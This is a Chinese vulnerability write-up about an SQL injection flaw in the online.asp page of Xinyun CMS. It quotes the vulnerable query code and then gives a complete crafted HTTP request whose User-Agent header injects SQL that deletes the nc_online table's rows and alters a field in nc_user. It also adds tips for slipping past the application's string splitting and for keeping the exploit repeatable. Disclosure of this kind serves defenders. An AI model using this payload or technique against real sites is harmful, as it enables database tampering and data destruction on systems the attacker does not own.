当前位置: 代码网 > 服务器>网络安全>漏洞分析 > 新云CMS Online.asp页面过滤不严导致SQL注入漏洞

新云CMS Online.asp页面过滤不严导致SQL注入漏洞

2008年10月08日 漏洞分析 我要评论
新云CMS Online.asp页面过滤不严导致SQL注入漏洞 受影响系统:最新版本漏洞文件:/inc/online.asp代码分析如下:OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip,browser... 08-10-08
受影响系统:
最新版本

漏洞文件:
/inc/online.asp

代码分析如下:
onlinesql = "insert into nc_online(id,channelid,username,identitys,station,ip,browser,starttime,lasttime,userid,strreferer) values (" & usersessionid & "," & cid & ",'" & strusername & "','" & stridentitys & "','" & currentstation & "','" & remoteaddr & "','" & browsertype.platform&"|"&browsertype.browser&browsertype.version & "|"&browsertype.alexatoolbar&"'," & nowstring & "," & nowstring & "," & userid & ",'" & strreferer & "')" //第69行
。。。。。。
agent = request.servervariables("http_user_agent") //第99行
。。。。。。
elseif left(agent, 5) = "opera" then '有此标识为浏览器 //第162行
agent = split(agent, "/")
browser = "mozilla "
tmpstr = split(agent(1), " ")
version = tmpstr(0)
http_user_agent我们可以控制,则version变量我们就可以控制了。

构造数据包如下:
post /inc/online.asp http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://localhost/xx.htm
accept-language: zh-cn
ua-cpu: x86
accept-encoding: gzip, deflate
user-agent: opera/haha',2008,2009,11111,'');delete from nc_online;update[nc_user]set[buycode]=7;--
host: localhost
connection: keep-alive
cookie: aspsessionidaabbcrrs=ffgndbddkjlfadogomklbgpf
成功执行sql语句

注意的地方:
1. 在两次分割成数组的时候是以"/"和" ",所以构造的sql语句时使用的间隔符就不能用/**/和空格,上面是使用tab键弄出来的空格。
2. 一定要加上delete from nc_online,不然下次程序就不执行insert语句,而改成执行update语句了。
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com